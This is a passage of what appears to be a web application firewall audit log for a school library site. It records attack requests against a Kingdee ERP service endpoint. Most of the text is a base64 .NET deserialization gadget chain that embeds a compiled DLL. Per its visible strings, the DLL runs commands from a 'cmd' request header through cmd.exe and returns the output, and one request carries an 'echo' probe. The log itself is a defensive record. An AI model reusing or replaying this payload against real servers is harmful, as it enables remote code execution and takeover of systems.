ABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQm9vbGVhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZqAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZrAAAACE1vdmVOZXh0CgFJAAAAQwAAAAlrAAAACT4AAAAJagAAAAZuAAAAEkJvb2xlYW4gTW92ZU5leHQoKQZvAAAAGVN5c3RlbS5Cb29sZWFuIE1vdmVOZXh0KCkIAAAACgFKAAAAQgAAAAZwAAAAvQJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZzAAAAC2dldF9DdXJyZW50CgFLAAAAQwAAAAlzAAAACT4AAAAJcgAAAAZ2AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkGdwAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGeAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGegAAABBTeXN0ZW0uQWN0aXZhdG9yBnsAAAAOQ3JlYXRlSW5zdGFuY2UKAU0AAABDAAAACXsAAAAJPgAAAAl6AAAABn4AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGfwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQgAAAAKAU4AAAAPAAAABoAAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACToAAAAQTwAAAAIAAAAJggAAAAgIACAAAASCAAAAC1N5c3RlbS5HdWlkCwAAAAJfYQJfYgJfYwJfZAJfZQJfZgJfZwJfaAJfaQJfagJfawAAAAAAAAAAAAAACAcHAgICAgICAgITE9J07irREYv7AKDJDyb3Cws=","format":"3"} --20ec0876-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --20ec0876-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=text/json"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747937955747136 5571 (- - -) Stopwatch2: 1747937955747136 5571; combined=3635, p1=599, p2=2937, p3=32, p4=37, p5=29, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20ec0876-Z-- --9618de2d-A-- [23/May/2025:01:19:21 +0700] aC9qqeThJmFSRJ5-OZfqHgAAAFI 103.236.140.4 33042 103.236.140.4 8181 --9618de2d-B-- POST /Kingdee.BOS.ServiceFacade.ServicesStub.User.UserService.SaveUserPassport.common.kdsvc HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 15909 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9 Content-Type: text/json cmd: echo QZPuWzkJnV X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 162993424 --9618de2d-C-- {"ap0":"AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMctAAACAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNv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b2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYiAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAQAAAABwAAAAkDAAAACgkkAAAACggIAAAAAAoICAEAAAABEQAAAA8AAAAGJQAAAPUCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDd